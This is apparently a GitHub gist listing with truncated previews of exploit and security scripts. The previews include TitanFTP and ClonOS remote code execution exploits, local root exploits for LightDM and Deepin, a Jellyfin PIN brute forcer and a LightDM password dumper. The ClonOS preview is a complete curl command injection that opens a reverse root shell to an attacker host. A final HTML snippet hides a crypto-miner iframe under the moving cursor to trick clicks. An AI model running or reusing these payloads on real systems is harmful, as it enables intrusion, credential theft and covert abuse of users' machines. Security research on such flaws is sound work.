This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Detect PAM backdoors created by linux-pam-backdoor: | |
# https://github.com/zephrax/linux-pam-backdoor | |
# | |
# Note: this will likely only work with PAM version 1.3.0. | |
# --- | |
# $ ./backdoor.sh -v 1.3.0 -p some_s3cr3t_p455word | |
# Automatic PAM Backdoor | |
# PAM Version: 1.3.0 | |
# Password: some_s3cr3t_p455word |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE | |
# | |
# Requires remote administration interface to be enabled. (Default port 31001/tcp). | |
# Creates a new server and adds an event handler to execute a PowerShell reverse shell. | |
# --- | |
# $ ./titanftp-server-admin-event-handler-rce | |
# TitanFTP Server Administrator Event Handler Authenticated RCE | |
# | |
# Generating PowerShell reverse shell to 172.16.191.165:1337 ... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# clonos-root-rce | |
# Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker | |
# Note: Start netcat listener on LHOST:LPORT first | |
RHOST="172.16.191.240" | |
LHOST="172.16.191.165" | |
LPORT=1337 | |
curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
################################################################################ | |
# Jellyfin Password Reset PIN Brute Force # | |
# # | |
# Usually completes within a few minutes. Tested on Jellyfin version 10.2.2. # | |
# This will likely also work on Emby Media Server, but untested. # | |
# # | |
# Note: cURL must be installed and in $PATH # | |
# # | |
# Note: Upon successful expoitation, the password will be reset for all users, # |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358) | |
# --- | |
# Usage: ./lightpwn | |
# A LightDM session is required. Exploitation will lock the current session, | |
# and could take several minutes. It usually takes about a minute. | |
# When the screen stops flashing, unlock the session and run: /bin/subash | |
# --- | |
# There's nothing new or special about this exploit. | |
# It's simply a slightly more weaponised version of the original PoC, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit | |
# | |
# The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user | |
# in the sudo group to install arbitrary packages without providing a password, | |
# resulting in code execution as root. By default, the first user created on | |
# the system is a member of the sudo group. | |
# ~ bcoles | |
# | |
# Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# lightdmdump | |
# --- | |
# Dump clear text passwords from lightdm sessions on Ubuntu | |
# Requires root privileges to dump lightdm process memory | |
# Tested on Ubuntu 14.04.1 LTS and 16.04.4 LTS | |
# --- | |
# Bug discovered by: Sven Blumenstein | |
# Disclosure date: 2017-09-15 | |
# Source: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# List sub-domains using crt.sh | |
set -euo pipefail | |
IFS=$'\n\t' | |
error() { | |
echo "[ERROR] $*" | |
exit 1 | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
################################################### | |
# ----------------------------------------------- # | |
# Fuzz Origami Ruby gem with mutated PDF files # | |
# ----------------------------------------------- # | |
# # | |
# Each test case is written to 'fuzz.pdf' in the # | |
# current working directory. # | |
# # | |
# Crashes and the associated backtrace are saved # |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<body> | |
<div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01"> | |
<iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=your_public_key"></iframe> | |
</div> | |
</body> | |
<script> | |
window.onmousemove = function(e) { | |
var container = document.getElementById("container"); |
NewerOlder